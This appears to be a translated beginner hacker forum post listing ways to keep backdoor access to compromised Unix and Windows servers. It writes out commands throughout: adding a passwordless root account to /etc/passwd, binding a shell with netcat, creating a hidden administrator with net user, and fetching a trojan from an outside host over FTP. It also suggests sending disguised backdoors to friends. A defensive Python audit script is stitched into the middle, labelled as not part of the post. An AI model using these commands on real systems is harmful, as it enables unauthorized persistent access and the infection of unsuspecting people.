For beginners like us, finally getting hold of a server is not easy, and it is miserable if it is then discovered. In fact, there are many ways to open a back door; below I will talk about several that I have learned.
1. Set the suid bit on a shell. This is very simple, but it can easily be found.
2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd
That is, it adds an account with ID 0 (root) and no password to the system, but the administrator can find it with the find command.
3. If the system has ports 512 and 513 open, you can add the account called hack to the .rhosts file and log in with rlogin without a password.
4. Add a "wiz" command, then telnet www.xxx.com 25; after entering wiz, that is all it takes.
5. Rootkit virus
These are very popular right now, but pay attention to small details such as the file dates. Some you need to compile yourself, others come already compiled.
Sunx's backdoor is very good: it produces no log files and hides from who and the like. It needs compiling, and it runs very well on Red Hat 6.1, but on 7.1 and other versions it seems to have a few bugs.
Or you can use a bindshell, replacing a rarely used service in inetd.conf; note the file modification time.
7. HTTP backdoor
In fact, firewalls generally restrict the Web service less, so we can start from here; this requires port redirection. Simply put, two services are open on the web port: one is HTTP itself, the other is a remote bindshell. When the firewall filters every other port and prohibits reverse connections, the simple option is nc (netcat), which binds cmd.exe to port 80; telnet www.xxx.com 80 and you get a shell. Or you can use a back door written in ASP, PHP, CGI or other code, to the same effect.
If it is a *nix server, there is no way.
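A defender's check for the account described in method 2, as an added example that is not part of the original post: it parses passwd-format text and flags empty password fields and UID 0 on any account other than root. The function name, the `allowed_uid0` parameter and the sample file contents are assumptions constructed for illustration.

```python
"""Audit passwd(5)-format text for the account pattern from method 2."""
from dataclasses import dataclass


@dataclass
class Finding:
    line_no: int
    user: str
    reasons: list


def audit_passwd(text, allowed_uid0=("root",)):
    """Return a Finding for every entry that looks like a planted account."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            # Hand-appended lines are often malformed; report, do not skip.
            findings.append(
                Finding(line_no, fields[0], ["malformed entry (expected 7 fields)"]))
            continue
        user, passwd, uid = fields[0], fields[1], fields[2]
        reasons = []
        if passwd == "":
            reasons.append("empty password field")
        if not (uid.isascii() and uid.isdigit()):
            reasons.append("non-numeric UID")
        elif int(uid) == 0 and user not in allowed_uid0:
            reasons.append("UID 0 on non-root account")
        if reasons:
            findings.append(Finding(line_no, user, reasons))
    return findings


# Constructed sample: three ordinary entries plus the line from method 2.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hack::0:0::/:/bin/csh
"""

if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f.line_no}: {f.user}: {', '.join(f.reasons)}")
```

To audit a live host, pass the contents of /etc/passwd to `audit_passwd`; systems that keep a second legitimate UID 0 account can list it in `allowed_uid0`.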
net user hacker windychild /add
net localgroup administrators hacker /add ...to create the super admin user
echo open www.xxx.com>c:\ftp.txt
echo get srv.exe>>c:\ftp.txt
copy srv.exe c:\winnt\
del c:\srv.exe ...... You can set up your own Trojan horse or back door, etc.
.... Or you can write statements that open the 3389 service or telnet.
Another: open shares!
net share ipc=ipc$
net share hdc=c$
If you want to be harsher, simply put a rootkit for Windows on it.
Send a base64-encoded file to your friends, having first converted the back door .exe to message encoding.
In fact, the methods above are all very common. There are many more, and I can't list them all right now, but this is enough for the uninitiated!